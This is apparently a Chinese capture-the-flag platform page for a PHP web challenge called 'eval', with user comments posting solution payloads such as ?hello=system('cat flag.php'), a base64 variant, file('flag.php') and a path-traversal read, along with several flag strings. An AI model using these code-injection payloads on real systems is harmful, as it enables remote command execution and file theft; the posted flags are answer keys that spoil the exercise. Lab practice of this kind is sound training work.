evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 17447
提  示:
描  述:
eval
...
登录回复
评论
你呀你ii 2年前
举报

?hello=eval(system('cat flag.php | base64'))

回复 4
baianquanzu 2年前
举报

?hello=system('sort flag.php')

回复 0
xlxlxl 2年前
举报

?hello=system('cat flag.php')

回复 1
凉情梦回 2年前
举报

?hello=system('cat flag.php')

回复 3
liu666 2年前
举报

flag{930e51a7a500775093c95aae8b67e404}

回复 3
userdong 2年前
举报

?hello=system('cat flag.php')

回复 3
riacky 2年前
举报

?hello=system('cat flag*')

回复 3
hhthht 2年前
举报

flag{cea9de710e2926a7c49f12318caf3912}

回复 0
ryan777 2年前
举报

根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')

回复 3
AmazingForself 2年前
举报

看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539

回复 0
ryl123569 2年前
举报

?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}

回复 0
xiaobaiermei 2年前
举报

这里应该算的上是个文件包含吧

回复 0
17leaf 2年前
举报

flag{4ccf17345bf8d8b3c5a6d005cf17e00a}

回复 0
cap 2年前
举报

为啥我这样不行 ?hello=system("cat flag.php")

回复 0
Restwlaq 2年前
举报

因为cat查看php的源码,经过var_dump还是字符串形式的代码,php中这样的代码还是被解析了,所以就看不到了。所以必须base64转一下,防止被执行。 ?hello=system(’cat flag.php | base64')

回复 0
你的宝 2年前
举报

http://114.67.175.224:15626/?hello=file(%27flag.php%27)

回复 0
15056775319 2年前
举报

http://114.67.175.224:17077/?hello=system('cat../../../../../../../../flag')

回复 0

WriteUp

image
harry

1 金币

立即查看

评分(10)

解题动态

wujiayi 攻破了该题 9小时前
187784 攻破了该题 11小时前
hahahahahahaha 攻破了该题 11小时前
codegod 攻破了该题 18小时前
Julia 攻破了该题 1天前
kingxin 攻破了该题 1天前
123456sefss 攻破了该题 1天前
hanzkj 攻破了该题 1天前
touchcandy 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
bushi 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 2天前
2757547892 攻破了该题 2天前
没有伞的小白帽 攻破了该题 2天前
zcgzcx1234 攻破了该题 2天前
yjyyds 攻破了该题 2天前
walkerming 攻破了该题 3天前
f13yf 攻破了该题 3天前
问题反馈